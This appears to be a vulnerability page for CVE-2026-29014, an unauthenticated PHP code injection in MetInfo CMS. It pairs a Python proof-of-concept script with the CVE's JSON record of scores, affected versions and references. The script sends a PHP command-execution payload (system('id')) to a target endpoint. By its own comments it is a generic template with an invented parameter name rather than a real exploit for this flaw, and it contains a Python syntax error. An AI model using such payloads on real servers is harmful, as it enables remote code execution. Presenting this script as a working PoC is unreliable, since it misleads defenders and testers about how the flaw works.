CVE-2026-29014

import requests # PoC for MetInfo CMS Unauthenticated PHP Code Injection (CVE-2026-29014) # Target: MetInfo CMS 7.9, 8.0, 8.1 # Description: Sends a malicious payload to execute arbitrary PHP code. def exploit(target_url): # The specific vulnerable parameter might vary based on the exact vulnerability analysis. # This is a generic template assuming a parameter injection scenario. payload = { "vulnerable_param": "system('id');" // Example command to execute } headers = { "User-Agent": "CVE-2026-29014-Scanner" } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for command output.") print(response.text[:500]) # Print first 500 chars of response else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual vulnerable endpoint URL url = "http://target-site.com/vulnerable_endpoint.php" exploit(url)

{"cve": {"id": "CVE-2026-29014", "sourceIdentifier": "[email protected]", "published": "2026-04-01T13:16:35.063", "lastModified": "2026-04-07T20:38:52.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:7.9:*:*:*:*:*:*:*", "matchCriteriaId": "29AFA237-D322-4E9B-9D46-2EC80F113B29"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "0C64ACF0-643B-41D1-872B-1D5AB470FB9C"}]}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2026-06", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.metinfo.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/metinfo-cms-unauthenticated-php-code-injection-rce", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://websec.net/blog/cve-2026-29014-metinfo-cms-unauthenticated-php-code-injection-69cdc290c14a8a99e1f91b7a", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}